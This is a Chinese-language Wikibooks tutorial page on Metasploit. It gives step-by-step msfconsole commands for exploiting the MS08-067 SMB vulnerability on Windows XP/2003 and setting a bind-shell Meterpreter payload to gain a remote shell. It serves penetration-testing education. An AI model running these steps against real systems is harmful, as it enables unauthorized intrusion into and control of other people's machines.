跳转到内容

Metasploit/案例研究

来自维基教科书,开放世界中的开放书籍

使用 Metasploit 进行简单的手动利用

[编辑 | 编辑源代码]

假设

  • 您正在使用 Metasploit 的最新版本和漏洞利用(svn/subversion)
  • 目标机器是运行 Windows XP(SP1、SP2、SP3)或 Windows 2003(SP0)的 Windows 机器
  • 目标机器的 445 端口已打开(通过 nmap -p 445 <目标机器的 IP> 检查)


步骤

  • 1. 加载 Metasploit 的 msfconsole
  • 2. msf > info exploit/windows/smb/ms08_067_netapi
  • 3. msf> use exploit/windows/smb/ms08_067_netapi
  • 4. msf exploit(ms08_067_netapi) > show options
  • 5. msf exploit(ms08_067_netapi) > set RHOST <目标 IP>
  • 6. msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
  • !您可以使用 generic/shell_bind_tcp 作为有效负载以获得命令提示符。
  • 7. msf exploit(ms08_067_netapi) > set TARGET <选择与 'show targets' 命令给出的 ID 相对应的目标>。
  • 8. msf exploit(ms08_067_netapi) > exploit


如果一切顺利,您将获得一个 Meterpreter shell。从那里开始,您可以执行后期利用操作(在后期利用活动中解释 |https://wikibooks.cn/wiki/Metasploit/post_exploitation

使用 MS08_067_Netapi 的视频指南
http://guides.intern0t.net/msf1.php

华夏公益教科书